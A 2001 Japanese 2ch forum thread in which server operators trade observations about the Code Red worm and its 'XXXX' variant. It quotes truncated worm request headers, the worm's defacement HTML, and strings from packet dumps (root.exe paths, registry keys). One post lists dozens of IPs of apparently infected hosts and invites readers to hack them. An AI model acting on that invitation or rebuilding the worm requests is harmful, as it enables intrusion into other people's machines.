5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

「コード・レッド」って怖いの?

1 :名無しさん@お腹いっぱい。:2001/07/31(火) 16:14
【ワシントン30日時事】新種のコンピューターウイルス「コード・レッド」が米東部時間31日午後8時
(日本時間8月1日午前9時)から再び増殖を開始し、インターネットの機能を低下させる恐れがあると、
米連邦捜査局(FBI)の全米電子インフラ防護センター(NIPC)が警戒を強めている。
NIPCなどによると、「コード・レッド」は今月19日、9時間で25万台以上のシステムに感染し、
ホワイトハウスのウェブサイトにも攻撃を試みた。今回は突然変異によって危険度が増している可能性もあるという。
特に、マイクロソフト社のソフト「インターネット・インフォメーションサーバー」を使うシステム保有企業などに、
早急な対応を呼び掛けている。

明日はネットしないほうがいいのかなぁ。

2 :終了さん:2001/07/31(火) 16:22

■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■

3 :名無しさん@お腹いっぱい。:2001/07/31(火) 16:24
スレ乱立すな
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996547695

4 :名無しさん@お腹いっぱい。:2001/07/31(火) 16:32
>>2>>3
荒らしは無視。

5 :名無しさん@お腹いっぱい。:2001/07/31(火) 16:39
>>3
そのスレ立てた人とは別人。
「コード・レッド」のスレないじゃん。

6 :まぁまぁ:2001/07/31(火) 16:49
まぁパッチは当てときましょうね。
パッチでてるのにヤラれてDDoSに参加したら
どうにも言い訳できませんから。

7 :名無しさん@お腹いっぱい。:2001/07/31(火) 16:51
>>6
どうもありがとうございます。

8 :名無しさん:2001/07/31(火) 21:16
IISなんか使ってる奴は氏ねという事で明日が楽しみ。

9 :名無しさん@お腹いっぱい。:2001/07/31(火) 21:21
>>8
和やかに同意。

10 :名無しさん@お腹いっぱい。 :2001/08/01(水) 00:15
>>1
7/20にスレ立てってるよ(w
アホはとっとと氏ねや!
■米でレッドコードワームがホワイトハウスを攻撃中!?
http://ton.2ch.net/test/read.cgi?bbs=sec&key=995639924&ls=50

11 :名無しさん@お腹いっぱい。:2001/08/01(水) 08:13
まあいいんじゃないの >>10

今日IISで被害受けた人は書き込んでくれ〜。(管理人)
又は今日メールサーバーが使えなくなった人もプロバイダー名を書いてくれ。(ユーザー)

12 :11:2001/08/01(水) 08:15
メールじゃないや、Webだ。

13 :a bone:2001/08/02(木) 21:21
おしえてあげるYO
ttp://people.site.ne.jp/2001/2001.html

14 :名無しさん@お腹いっぱい。:2001/08/02(木) 21:47
て優香、うちの会社のサーバー(Linux)に、「…(略)default.
ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN…」ってアクセスが2、30分
おきにある、(あった)7/20ときのう。IPはまったく正体不明。
問題おきないとは思うけど、ウザイなあ…、あ、ちなみにうちの会
社はホワイトハウスではありません…ホワイトハウスってラブホが
Ddos攻撃受けてたら笑っちゃうけど…

15 :名無しさん@お腹いっぱい。:2001/08/02(木) 22:28
黄土劣土逝ってよし
http://www.codered.org/
http://www.code-red.co.uk/
http://www.code-red.de/
http://www3.airnet.ne.jp/codered/
http://www2.to/codered/

16 :名無しさん@お腹いっぱい。:2001/08/02(木) 22:33
http://www.metallic.co.jp/support/trouble/index.shtml

17 :名無しさん@お腹いっぱい。:2001/08/02(木) 22:44
http://www.interlink.or.jp/notification/backno/2001/trb025.html

18 :sage:2001/08/02(木) 23:14
>>11
あんま関係ないかもしれんが、8/1はYahooMailが不調だったな
コード・レッドの集中攻撃くらってレスポンスが落ちたのかな?

#YahooはBSDだぞとかいう厨房レスつけた奴は殺す

19 :名無しさん@お腹いっぱい。:2001/08/02(木) 23:25
おいおい!
コードレッドでひどい目にあったよ。
データ送出しっぱなし。
ログも満杯。

おかしいおかしいと思ってたら
コードレッドが入り込んでいやがった。

20 :18:2001/08/02(木) 23:26
>>14
default.
ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN

そうそう、これこれ。
連続送出してるからパケットアナライザで調べたら
このコードあったね。
これで始めてワームの仕業って解った。

21 :名無しさん@お腹いっぱい。:2001/08/03(金) 00:09
兎に角さぁ、IISかどうか確認してからやってくれよぉ・・・
Apacheだって、何度も言ってるだろ?

まだ来てるよ・・・ったく、アホらし・・・
一生やってろ

22 :名無しさん@お腹いっぱい。:2001/08/03(金) 00:25
>>18
YahooはBSDだぞ

23 :名無しさん@お腹いっぱい。:2001/08/03(金) 00:30
>>22
イタすぎ(ワラ

24 :sage:2001/08/03(金) 00:47
>>22=>>23
自作自演イタイ

25 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:01
>>24
(違) 更にイタイ

26 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:05
俺もまぜてくれよ

27 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:08
>>26
んじゃ、IISの鯖用意して、IP晒せ

28 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:11
無邪気な>>23-25に言ったんだよ。CodeRedはもうお腹いっぱい。
これ以上来なくていい。つーかIP晒してどうする

29 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:16
>>28
おっ俺 >>22 だけど入ってない(嬉

30 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:18
あっ、しまった。  ・・・しまったってことも無いな・・

31 :名無し:2001/08/03(金) 01:24
もう寝ようや

32 :名無しさん@お腹いっぱい。:2001/08/03(金) 01:32
>>31
今夜もNの嵐・・・鬱
あぁ、HDDの無駄・・・

33 :sage:2001/08/03(金) 05:57
実はこのウイルスIISのユーザの嫌がらせかもよ。(藁

34 :名無しさん@お腹いっぱい。:2001/08/03(金) 12:31
>>33 激しく同意

35 :名無しさん@お腹いっぱい。:2001/08/03(金) 18:33
東京めたりっく、コードレッドの実害大。

36 :14です:2001/08/03(金) 20:07
ところでさあ、きょうLinuxのログ解析しようと思ってtxtファイルに(ログを)落としてAccessでインポートしようとしたら、コケるんだ、Accessが…何回かトライしたら、dllのレベルでこけちゃうらしい…もしかしてIISに限らずMSのオブジェクト、すべて対象になっちゃう?

37 :なー:2001/08/03(金) 20:14
>>36
んなあほな。

38 :名無しさん@お腹いっぱい。:2001/08/03(金) 21:00
>>36
一回CSVをエクセル形式にしてからインポートすると
うまくいくという伝説がある

39 :名無しさん@お腹いっぱい。:2001/08/03(金) 21:24
>>36 そのログ何MBあるの?

昔Office97のAccess、Excelで5MBのログ解析をやったら激遅。
analog、wwwstat だと激速!
個人的には、analog か grepで必要な情報見た方が速いと思うが。

40 :14です:2001/08/03(金) 21:30
お騒がせスマソ…

ログは何メガもない。また、txtの段階で必要な行(NNN…を含む行)
のみ抽出したので、2,30行くらい。Excelなら読めた。どうやら
Accessがヘンなのかも…再インストしてみるよ。

Excelからのインポートもだめだった。でもなんか気になる…

41 :名無しさん@お腹にいっぱい。:2001/08/03(金) 23:14
/default.ida?NNNNNNNNNNNNN…
の発信元のサーバーってなぜ韓国が多いんだろか?
パッチ当ててないヴァカ技術者が多いんだろか?

42 :名無しさん :2001/08/03(金) 23:31
発信元を調べるとFirewall-1経由のやフィルタが掛かっててたどり着けないのも有ったから、確信犯かもしれないよ。

43 :名無しさん@お腹いっぱい。:2001/08/03(金) 23:45
糞コードレッド氏なす!花金がつぶれた

44 :名無しさん@お腹いっぱい。:2001/08/03(金) 23:49
花金・・・おっさんの匂いがする。近くにいるな

45 :名無しさん@お腹いっぱい。:2001/08/03(金) 23:56
44>マジデツッコムオマエハ・・・

46 :名無しさん@お腹いっぱい。:2001/08/03(金) 23:57
それよかw2kにM$のパッチ当てたらiriaが止まるようになったよ
余所への過剰なhttpを無差別に押さえ込んでるんじゃなかろうな

47 :名無しさん@お腹いっぱい。:2001/08/04(土) 00:47
>>39-40
そんなん、Access、Excel、analog、wwwstat 使うほどの量か?(藁
grepして、流し見で充分・・・
大体、どう解析するわけ?(藁

48 :名無しさん@お腹いっぱい。:2001/08/04(土) 00:55
>>47
激しく同意
コードレッドにかぎらず
httpのアクセスログには解析する余地が無いな

49 :いんたーねっといんふぉめーしょんさーびす:2001/08/04(土) 10:13
いいかげんウザイ。
漏れのserverはトラフィックが少ない。
が、その半分がクソIISクソ管理者のおかげ。
もう何個あるのか数えたくも無い。
誰か数えろ。
つーかこのIPハッキングの実験にでも使ってくださいな。
どーせクソ管理者(藁


24.229.50.49
24.112.33.216
211.45.212.222
210.90.239.193
210.177.143.81
213.11.82.35
211.61.184.185
211.23.232.182
148.208.143.4
61.135.110.130
216.76.15.171
213.84.215.2
210.219.86.172
217.15.64.198
64.242.115.165
195.178.183.203
216.53.74.93
195.122.185.132
216.16.224.130
206.153.58.147
163.121.197.150
208.57.255.99
62.161.74.159
210.201.72.136
205.205.100.19
203.169.156.130
210.205.191.50
203.58.197.228
211.223.14.137
63.205.131.29
217.126.69.227
210.85.56.233
212.175.156.35
211.56.9.99
24.12.165.106
24.250.22.176
211.67.218.60
210.102.1.87

50 :14です:2001/08/04(土) 10:13
>>47-48
解析、ってわけじゃないけど、ここに出てるIPとか、おれんとこに
来たIPとかをマッチングさせて、何かの規則性があるか調べようと
した訳。

51 :いんたーねっといんふぉめーしょんさーびす:2001/08/04(土) 10:14
209.183.213.143
64.52.176.208
203.248.215.5
61.170.151.202
61.134.82.99
62.161.74.159
210.201.72.136
205.205.100.19
203.169.156.130
210.205.191.50
203.58.197.228
211.223.14.137
63.205.131.29
217.126.69.227
210.85.56.233
212.175.156.35
211.56.9.99
24.12.165.106
24.250.22.176
211.67.218.60
210.102.1.87
209.183.213.143
64.52.176.208
203.248.215.5
61.170.151.202
61.134.82.99
211.171.1.148
203.235.112.136
157.238.133.154
24.161.172.55
203.141.149.36
194.206.162.113
170.210.247.130
202.21.5.72
65.28.239.152
61.157.93.159
195.162.177.53
216.219.45.18
24.253.66.33
210.102.212.10
209.239.214.144
213.46.214.189
211.214.203.235
203.126.139.146
203.204.8.137
203.67.77.171
63.111.243.186

52 :名無しさん@お腹いっぱい。:2001/08/04(土) 11:00
>>50

規則性って・・・一体何万個のIPを調べる気?(ワラ

53 :名無しさん@お腹いっぱい。:2001/08/04(土) 12:43
しかし、Code Red のアタックって
飽きもせずに来るねえ。

54 :名無しさん@お腹いっぱい。:2001/08/04(土) 13:10
飽きる事無く作業を続けるのが機械だからね。

55 :名無しさん@お腹いっぱい。:2001/08/04(土) 14:13
>>50
ハァ?規則性・・・あるわけねーだろ(藁
世界のお馬鹿IISのIPアドレスは、散在してるっちゅーの

>>53
飽きずにって・・・ワームが広がってんだから、飽きる・飽きないの問題じゃねーだろ?

こいつら、何が起こってるかわかって書いてるのか?(呆藁

56 :14です:2001/08/04(土) 14:54
俺、温和な人間なんで、あんまり怒んないんだけど…

>>55
「規則性…あるわけねーだろ…」って言ってるけど、絶対ないってどっか
で情報得てるわけ?技術者だったら、未知の現象に対して、なんらかの法
則なりがないかどうか、時間が許せば(ヒマなら)調べる位の姿勢(好奇
心程度かもしれんが)、あってもいいんじゃないの?

ていうか、しょせん2Chていわれればオシマイだけど、人の意見に公共
の場(しょせん2Chかもしれんけど)で「ちゅーの」とか「ねーだろ」
って口調は、よくないんじゃないですか?

皆さんどう思われます?ここはコードレッドについて語る場であって、こ
んなこと書くべきではないとも思ったのですが…つい

57 :名無しさん@お腹いっぱい。:2001/08/04(土) 14:57
>>55
>散在してるっちゅーの
>問題じゃねーだろ?
だめ!絶対駄目!!

>散在してるっつーんだよ!あ゙?
>問題じゃねーんだよ!
これならOK。

58 :×○×:2001/08/04(土) 15:03
規則性調べるよりテスト用サーバーに感染させてプロセスに
アタッチさせてコードを見た方が早いと思われ。

59 :名無しさん@お腹いっぱい。:2001/08/04(土) 16:34
>14
MXで逆アセンブルしたソース見かけたよ。拾って、解析してみれば?
でも、規則性なんか調べてどうすんの?(笑)

60 :名無しさん@お腹いっぱい。:2001/08/04(土) 18:01
規則性って、乱数でしょ。
で、乱数なんだけど種が固定なので、IPアドレスによっては
ぜったいにアタックされないと。

61 :名無しさん@お腹いっぱい。:2001/08/04(土) 18:15
>>56=14
非常識=アホ丸出し

62 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:09
>>14
未知の現象ってなんだ?(w
そんなことやってるヤツは技術者失格+解雇だな(w

63 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:16
夕方になって
GET /default.ida?NNNNNNNN.. が
GET /default.ida?XXXXXXXX.. に変わった。

64 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:24
>>63
そう?私のところは今までと変わらん。

って,ひょっとしたら亜種が作られたのかもしれんな。
IISなんて使ってない(使えない)からいいが,もう少々,
状況を静観する必要があるな…

65 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:36
うん、あきらかに亜種だね。たった今リクエスト捕まえてみたら、今まで

GET /default.ida?NNNNNNNNNN(略) HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569

こんなリクエストだったのが、

GET /default.ida?XXXXXXXXXX(略) HTTP/1.0
Content-type: text/xml
Content-length: 3379

こんなんが出てきてる

66 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:40
>>63
うちもだよ。

67 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:42
このログはPerlで書いた偽HTTPDで取ったもので、
リクエストが来た瞬間にBeep音が鳴るようにしてあるんだけど、

>>65のやつはほぼ同時に来た。ちなみにホストは別、
上の従来の奴は
[20:32:15] usgm012n085.ppp.infoweb.ne.jp(61.124.69.85)
下のXになってる奴は
[20:32:13] cj3147636-a.kkbnj1.kt.home.ne.jp(210.20.199.105)

2秒差って所がちょっと気になる。どうでもいいけどJ-COMで
鯖たてるなよ・・・。俺は我慢してるってのに

68 :名無しさん@お腹いっぱい。:2001/08/04(土) 20:57
NT4でセキュリティパッチ(2つあるうちのひとつ)あてたら
キー入力が変になった
同じ文字がだぶるのでログオンに苦労したけど、削除したら直った

69 :64 :2001/08/04(土) 21:01
ログ見張ってたら,私のところにもGET /default.ida?XXXXXXXXが来た。

なんっーか,リアルタイムで状況が進展しつつあるな。w

70 :名無しさん@お腹いっぱい。:2001/08/04(土) 21:16
なんかXの奴の勢い凄くないか?

71 :名無しさん@お腹いっぱい。:2001/08/04(土) 21:21
Xくん,1分も待たずに次のが来るぞ...うちのApacheくんも
凄い勢いで大容量ログを吐いてきやがる。ゲロゲロ。

72 :名無しさん@お腹いっぱい。:2001/08/04(土) 21:23

うちも20時後半から3分おきに来てる<X版

73 :65:2001/08/04(土) 21:25
X君、8時ぐらいからやたら増えたね。うちJ-COMなんだけど、
やたらJ-COMユーザーからのアクセスが多い。つーかほとんど

74 :名無しさん@お腹いっぱい。:2001/08/04(土) 21:31
NからXに変わって、ステータスコードも変わった(藁)
(Apache 1.3.20)

75 :55やけど?:2001/08/04(土) 21:46
>>14
もう既に的確な回答が出てるようやけど、
まだ、なんか文句ある?

76 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:01
>>75
マァマァ むし返すのはやめときなさい

77 :はふはふ:2001/08/04(土) 22:01
XXXXバージョン、うちにもきた。krから。

78 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:03
xxxxバージョンもnnnも来ているがxxxのほうが圧倒的に多い

79 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:07
XもNも、Content-Lengthが全然あってないのは何故だ?

80 :なー:2001/08/04(土) 22:29
Xくん。さっきうちにも来た。
worldbank.orgより。大丈夫か世界銀行(藁

81 :なー:2001/08/04(土) 22:31
>>78
激しく同意。21時以降はXXX:NNN=9:1くらい。

82 :79:2001/08/04(土) 22:36
失敬。パケットダンプしたらすぐわかった。
でもGETなのに・・・、どうも釈然としない。

それはともかく、Nにあった

c:\notworm LMTH
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=english">
<title>HELLO!</title></head><bady><hr size=5><font color="red">
<p align="center">Welcome to http://www.worm.com !<br><br>
Hacked By Chinese!</font></hr></bady></html>

の部分が、Xだと無くなってるね。

83 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:48
XXXXX は 19:30 に最初のが来てからもう45件。
NNNNN の方は今日一日で25件しか来ていないのに。

で、たった今こんなのが来たんだけど、ナニこれ?
Code Red とは関係なさそうだけど、408 ってなんだ?

211.22.89.222 - - [04/Aug/2001:22:42:58 +0900] "-" 408 - "-" "-"

84 :79:2001/08/04(土) 22:53
ついでにXの方のパケットダンプ眺めてたら、Nには無かった

RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey

こんな記述が。いったいどんな亜種になったのやら・・・。
ざっと見た感じだと、大幅に書き換えられてる気がする

85 :なー:2001/08/04(土) 22:53
>>83
http://nttcom.e-words.ne.jp/r-httpstatus.htm
ステータスコード。

86 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:56
default.idaって名前でHYBRISとかの実行ファイル
を置いておくとなんか起きるのかな。

87 :名無しさん@お腹いっぱい。:2001/08/04(土) 22:58
・・・・・・・

88 :さげ:2001/08/04(土) 22:58
つーか「コードイエロー」??(藁

89 :なー:2001/08/04(土) 22:59
>>86
案外サーバ側で実行されたりしてな。

90 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:03
案外も何も・・・

91 :ばか?:2001/08/04(土) 23:06
ばかなの?

92 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:08
ばかなんでしょうね

93 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:09
XXXXXX は日本からがやたら多いぞ。今までにうちに来た50件のうち、
zaq.ne.jp が14件、mesh.ad.jp が5件、その他国内 ISP が数件。
攻撃対象の選び方が NNNNN のときと変わってたりする???

zaqd3872362.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd38742fa.zaq.ne.jp
zaqd3872023.zaq.ne.jp
zaqd3872023.zaq.ne.jp
zaqd387438b.zaq.ne.jp
zaqd3871dcf.zaq.ne.jp
zaqd3873f2d.zaq.ne.jp
zaqd3872362.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd3874f19.zaq.ne.jp
zaqd3871dcf.zaq.ne.jp
zaqd387202d.zaq.ne.jp
zaqd387202d.zaq.ne.jp
ctk28ds12.tk2.mesh.ad.jp
ctk219ds13.tk2.mesh.ad.jp
ip1a0485.hkd.mesh.ad.jp
ip1c0860.tky.mesh.ad.jp
ip1c0985.tky.mesh.ad.jp

94 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:11
HYBRISじゃなくてワクチンソフトを置いておけば、
アタックを仕掛けてきたマシンからウイルスを
消せるとか?

95 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:13
やっぱりばかなんでしょうね

96 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:15
俺J-COMなんだけど、J-COMユーザーからのアクセスが
やたら多い。対象とするIPの規則が変わったかな

97 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:18
>>94
おぉ!それいい案♪
是非、ワクチンソフト作って!

つーか、今回これで、Windows鯖激減するな・・・

98 :sage:2001/08/04(土) 23:23
トレンドマイクロ、シマンテック様各位


ご承知のとおり、マイクロソフト社の「インターネットインフォメーションサーバー」が猛威を振るっています。
至急、弊社のアンチウイルスソフトで「インターネットインフォメーションサーバー」を駆除するようにしてください。


宜しくお願いいたします。

99 :あげ:2001/08/04(土) 23:26
>>97
同意。
Windows鯖が減少するというか、IISが減少。
まぁそれでWindows鯖が結果的にすくなると思うが・・・
本当に鯖立てたいやつはApacheにするだろう(藁

100 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:27
一気に47回アクセスされたぞ…
まったくやめてくれよ。

101 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:28
8、9時台は日本からのアクセスばっかりだったけど、
今ニュージーランドからもXバージョンが来た。

102 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:28
XXXXX はほとんどが 211.xxx.yyy.zzz からだな。
うちのところには今までに XXXXX が50ちょっと来てるけど、
61.aaa.bbb.ccc からひとつ来た以外はぜんぶ 211.xxx.yyy.zzz だ。

103 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:30
うちは210からがほとんど。他からもちょこちょこ来てるけど

104 :102:2001/08/04(土) 23:33
よく見たら自分(eAccess+BIGLOBE)の IP アドレスも 211.135.yyy.zzz だった。
NNNNNN は乱数だったけど、XXXXXX はインクリメントしながら順番に叩いてるのか?

105 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:36
>>99
そしたらApacheが標的になるんじゃない?
要はいたちごっこなわけで。

106 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:40
>>84
俺もダンプ取って見た

・GetSystemDefaultLangID
まさかわざわざ言語設定までチェックしてなんかやってんのかね

・CMD.EXE

・d:\inetpub\scripts\root.exe
・d:\progra~1\common~1\system\MSADC\root.exe
なぜDドライブ?

EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts

怪しい記述が多すぎ。確かに以前のコードとかなり違う感じ

107 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:41
だんだん海外からのX君が増えてきたな

108 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:45
>>104
多分そんな感じだろうね。おれJ-COM@Nethomeなんだけど、
同じNethomeからのアクセスがほとんど。だからIPはどれも210

109 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:47
>>105

Web Server のシェアは、Apache が6割。IIS が 2割強。
Apache だって標的になっているはずだが、せいぜい WEB
ページの改ざん(それも、Apache 自身ではなく、OSの脆弱
性をつく)まで。IIS ほど、ワームが作りやすい状態じゃないし。

IISは構造的に欠陥だらけなのよ。

110 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:51
>>109
激しく同意。
あと、NT,2000+IISを立てる人間は、スキルの無い人間が多いというのもある。
(今回のワーム拡散原因)

111 :なまえをなまなあ:2001/08/04(土) 23:53
code redとsadmindをまぜた感じかな。
d:なのはsadmind対策でc:から別ドライブに移しているのが
あるからかもしれないがd:にcmd.exeがなきゃ意味ないし、
なぞだな。

112 :なー:2001/08/04(土) 23:55
あのー。
XXXと本来の訪問者の比が
XXX>>>>>本来の訪問者
なんですが。どうしたら良いでしょうか?(藁

113 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:56
おっ、久しぶりにNが来た

114 :名無しさん@お腹いっぱい。:2001/08/04(土) 23:57
>>112
ワラタ・・・
もう電源落としたら?

115 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:04
NNN と XXX って、突いてくるセキュリティホールが同じなだけで、
もしかして、ワームとしてはまったく別物だったりします?

116 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:04
Apacheのログ見てて気づいた。
XXXXXXだと404で、
NNNNNNだと400返してる。
この違いって??

FreeBSD(98)4.2RELEASE+Apache1.3.17

117 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:05
ブロードバンドスピードテスト
計測結果
測定サイト http://speedtest.pos.to/
測定時刻 2001/08/04(土) 23:50:33
回線種類 ADSL
回線業者 NTTフレッツADSL
プロバイダ ******
データサイズ 16.762kB
伝送時間 19.49秒
ホスト1 WebARENA 1kbps
ホスト2 WebARENA(2) 7kbps
ホスト3 pos.to 8kbps
ホスト4 pos.to(2) 1kbps
推定スループット 0.9kB/s
推定スループット 7kbps
コメント NTTフレッツADSLとしては遅いです。
設定や回線を見直してみてください。(5/5)

もういや

118 :116:2001/08/05(日) 00:09
既出

ゴメソ

でもなんで・・・?

119 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:10
>>115
まったくってことは無いだろうけど、ダンプ見てみると
NとXじゃずいぶん違ってる。

120 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:19
どーでもいいけど、Code Red スレ統合しません?
同趣旨のスレが上の方にいくつも…。

121 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:22
>>120
したいけど無理でしょ

122 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:28
>>121
・・に同意(悲

123 :赤い稲妻:2001/08/05(日) 00:49
Xバージョンってなにやってんだろ、結構やばそうだけど。
誰か感染してみてくれない?
月曜日は大変かも。

124 :名無しさん@お腹いっぱい。:2001/08/05(日) 00:56
もしかして先客としてNがいたら、Xに書き換えるとかやってんのかな。
いくらなんでもXが多すぎる。

125 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:05
30分の間に20回も叩かれた。今夜は虫のお祭りか?

126 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:19
誰かニュース速報板に Code Red スレたてて!

127 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:22
XXXになってからZZZは一回も来てない
XXXって2回づつ叩かれてませんか?
どうですか?

128 :赤線:2001/08/05(日) 01:26
同じプロバのダイヤルアップのヤツからも来た。よほどうんの悪いやつだなぁ。
合掌。

129 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:51
>>126
もうたってるよ
http://kaba.2ch.net/test/read.cgi?bbs=news&key=995985124&ls=50

130 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:52
オレも自分のIPは ???.???.???.117 だけど
同じプロバの ???.???.???.28 から攻撃が来た・・・
悲しいよ・・・

131 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:52
先週の訪問数から考えるとすごい勢いで増えてるよ〜。
XXX になってちょっと頭良くなったみたい。ルーターの
ポート閉じようかしらん。

132 :名無しさん@お腹いっぱい。:2001/08/05(日) 01:54
被害者なの?この人たち。
ftp.sorionline.com
210.183.126.136
193.c210-85-165.ethome.net.tw
h199.p486.iij4u.or.jp
tpfa2231.246.ne.jp
lr01pool50.usiwakamaru.or.jp
d228185.ppp.asahi-net.or.jp
210.119.226.247...etc

133 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:03
stream1.mbeat.com からいらっしゃいました。
ストリームサーバがヤラレちゃってるって、だいぶイタイのでは...

134 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:08
あ゛ー
これが何かすごい事件の引き金になってくれれば IIS なんて使う奴
いなくなるのに...。

どうでもええが固定 IP でもないのに 3〜10 分に一回のペースに
なってきたぞ。訳もわからず IIS 立てたテレホ厨房がわんさかと
接続中といったところか。

135 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:11
台湾、中国、露西亜、韓国、亜米利加、うーん国際色豊かだ (藁

さっきから同じプロバイダがやたら目に付くんだが、自分の
グローバル IP の隣接 IP から始めてんだろうか?

136 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:12
もうバカは回線切れって感じ

137 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:12
コレのせいか・・・・。マジびっくりしたヨホント。
てっきり狙われているのかと思ったっす。
無料二つ使ってんだけど接続の度に必ず80をたたいてきて・・・。
ああ・。鬱だ。

138 :hogehoge:2001/08/05(日) 02:15
Code Redって先月(7/19)の第一波の時のは
感染したマシンがwww.whitehouse.govにDoSかけたんだよね
今のXXXXXタイプって感染後の増殖自体はは相変わらず
やってますが、その後のDoSとか、感染後の挙動は何か変わって
るんでしょうかねー?

そっちも結構気になるかも
帯域食われるの嫌で。。。

139 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:19
IIS入れてないWin2kもX型はやばかったりして・・・
つーか異常な多さだ。世界中でやってたら大変だな

140 :137:2001/08/05(日) 02:21
で、ポート80を叩いてきたのはそのコードレッドって奴で合ってますか?
すんません。

141 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:23
合ってます

142 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:25
MSのサイトに

>>IIS は多くのアプリケーションに自動でインストールされます

って、あるんですけど、IIS入れてないつもりでも、
勝手にインストされてるってことあるんでしょうか?
こわいから、パッチ当てました。

143 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:26
ありがとう。でも何故か裏ニュースパケット送ったみたいなんだけど。。。
しかも自分では行ってないのに・・・。やっぱりウイルスとか感染してんのかな。
ウィン98

144 :あのぉ。:2001/08/05(日) 02:29
CodeREDの感染、うっとおしかったのですが、相手先がまぁ同胞の県内だったとこもありメールで管理者へ私信を投げました。
自分も含め固有の情報がしっかり書いてあるんですが、OEを使っているんで、メールのつもりが某ニュースへ放り込むという体たらく。双方の馬鹿さをさらけ出してしまいました。投稿ミスを削除したんですが、ニュースから消えてくれません。
私逝くべきでしょうか? 死にたいです。はぁ^〜。。。

145 :hogehoge:2001/08/05(日) 02:30
既出かもしれないですが
一応Code Redスキャンアプリ公開されています
http://www.eeye.com/html/Research/Tools/codered.html
http://www.eeye.com/html/Research/Tools/CodeRedScanner.exe

心配だったらスキャンしてみたらどうでしょう

146 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:34
>>141
apacheのprot80つかってるんだけど
違うprotにしたらいいかな?

147 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:37
>>142 IIS も Apache も立てた覚えが無いなら、下のリンクをクリックして
「ページを表示できません」「サーバーが見つからないか、DNS エラーです。」
と出れば安全。

http://localhost/

# と言ってる間に香港からの客人が NNNN と...

148 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:39
>>146
いや、Apacheならなんの問題も無いけど

149 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:40
>>147
おお。ありがとうございます。
「安全」でした!

150 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:41
ただいま自宅のアパートです。
会社のサーバが心配なんだけど、外から Code Red に感染しているか
分かる方法ありますか?

151 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:41
今日はお祭りですか? (藁

152 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:43
>>150
管理者?

153 :omaeha:2001/08/05(日) 02:46
>>150
145の身になってやれよ...

154 :sage:2001/08/05(日) 02:53
>>150
ログ見ようね。

155 :145:2001/08/05(日) 02:56
ちょっとあのスキャンツールで変なことが分かりました

今まさにGET /default.ida?XXXXXXXXX
これ投げてきた相手のアドレス範囲にScanかけたんだけど
検出できなかったです

どしてだろ?Pingも通るんだけどね。ついでに
nmapやってみたけど(汗 ガバガバPortあいてる。。。

